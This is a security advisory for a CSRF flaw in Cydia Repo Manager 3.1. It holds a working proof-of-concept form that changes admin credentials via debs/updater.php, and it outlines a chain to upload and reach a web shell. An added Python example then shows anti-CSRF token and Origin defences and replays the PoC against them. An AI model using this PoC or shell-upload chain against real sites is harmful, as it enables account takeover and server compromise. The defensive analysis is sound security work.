# Cydia Repo Manager CSRF Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/exploits/Cydia_Repo_Manager.txt
# Software Link: http://damarist.de/?lang=en
# Download : http://damar1st.de/downloads/CydiaRepoManager3.1.zip
# Tested: Win 7

Proof of concept (an attacker-hosted form that posts new credentials to debs/updater.php; no anti-CSRF token is required):

<form method="post" action="http://bastardlabs/[CydiaRepoManager_path]/debs/updater.php">
<input type="text" name="user" value="Username"/> <br />
<input type="text" name="pass" value="Password"/><br />
<input type="submit" name="s" value="w00tw00t!" />
</form>

Login : http://bastardlabs/[CydiaRepoManager_path]/index.php

Upload Shell : http://bastardlabs/[CydiaRepoManager_path]/deb.php

Shell : http://bastardlabs/[CydiaRepoManager_path]/downloads/shell.php

Demo :

http://bastardlabs.info/demo/CydiaRepoManager1.png
http://bastardlabs.info/demo/CydiaRepoManager2.png
http://bastardlabs.info/demo/CydiaRepoManager3.png
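The application-side fix for the flaw above is a per-session anti-CSRF token that every state-changing POST (updater.php included) must carry, checked in constant time, with an Origin/Referer check as a second layer. The following is an added Python example written for this page, not code from the advisory or from Cydia Repo Manager: it models updater.php as a function, replays the PoC's form fields against it, and then submits a legitimate form. The session layout, the field name `csrf_token`, the handler names and the origins `repo.example` / `attacker.example` are all assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Added example (not code from the advisory or from Cydia Repo Manager):
# the defensive pattern a credential-changing POST handler such as
# debs/updater.php should apply. Names, fields and origins are assumptions.

SESSION_TOKEN_KEY = "csrf_token"            # where the per-session token lives
FORM_TOKEN_FIELD = "csrf_token"             # hidden field the real form must carry
TRUSTED_ORIGINS = {"http://repo.example"}   # constructed: the app's own origin


def issue_token(session):
    """Create a per-session CSRF token once and hand it to the template."""
    if SESSION_TOKEN_KEY not in session:
        session[SESSION_TOKEN_KEY] = secrets.token_urlsafe(32)
    return session[SESSION_TOKEN_KEY]


def hidden_token_field(session):
    """The extra input the legitimate updater form embeds next to user/pass."""
    return '<input type="hidden" name="%s" value="%s"/>' % (
        FORM_TOKEN_FIELD, issue_token(session))


def origin_ok(headers):
    """Reject a POST whose Origin (or, failing that, Referer) is foreign.

    Browsers set Origin on cross-site form posts and the attacker's page
    cannot change it, so a submission from another site is visible here.
    """
    src = headers.get("Origin") or headers.get("Referer")
    if src is None:
        return True  # no header at all: the token check below still applies
    parts = urlsplit(src)
    return "%s://%s" % (parts.scheme, parts.netloc) in TRUSTED_ORIGINS


def token_ok(session, form):
    """Synchronizer-token check using a constant-time comparison."""
    expected = session.get(SESSION_TOKEN_KEY)
    submitted = form.get(FORM_TOKEN_FIELD)
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def handle_updater_post(session, form, headers):
    """Stand-in for updater.php: change credentials only when both checks pass."""
    if not origin_ok(headers):
        return 403, "rejected: untrusted origin"
    if not token_ok(session, form):
        return 403, "rejected: missing or invalid CSRF token"
    session["user"] = form["user"]  # the real credential update would go here
    return 200, "credentials updated"


def run_scenarios():
    """Replay the advisory's PoC against the hardened handler, then a real submit."""
    victim_session = {"user": "admin"}
    issue_token(victim_session)  # the victim is logged in and already has a token

    # 1. Cross-site PoC: the attacker's form sends user/pass/s but no token, and
    #    the browser stamps it with the attacker's Origin (constructed values).
    poc_form = {"user": "Username", "pass": "Password", "s": "w00tw00t!"}
    poc_headers = {"Origin": "http://attacker.example"}
    poc_result = handle_updater_post(victim_session, poc_form, poc_headers)

    # 2. Same PoC body with Origin/Referer stripped: still blocked, because
    #    the token is absent. The origin check is a second layer, not the only one.
    no_origin_result = handle_updater_post(victim_session, poc_form, {})

    # 3. Legitimate submission from the app's own page carrying the session token.
    legit_form = dict(poc_form, **{FORM_TOKEN_FIELD: victim_session[SESSION_TOKEN_KEY]})
    legit_headers = {"Origin": "http://repo.example"}
    legit_result = handle_updater_post(victim_session, legit_form, legit_headers)

    return poc_result[0], no_origin_result[0], legit_result[0], victim_session["user"]


if __name__ == "__main__":
    print(run_scenarios())  # (403, 403, 200, 'Username')
```

The token, not the Origin header, is what makes the PoC fail in scenario 2: the attacker's page can omit or suppress headers but cannot read the victim's session token, so it can never put the right hidden field in its form. Applying the same check to deb.php would close the upload step of the chain as well.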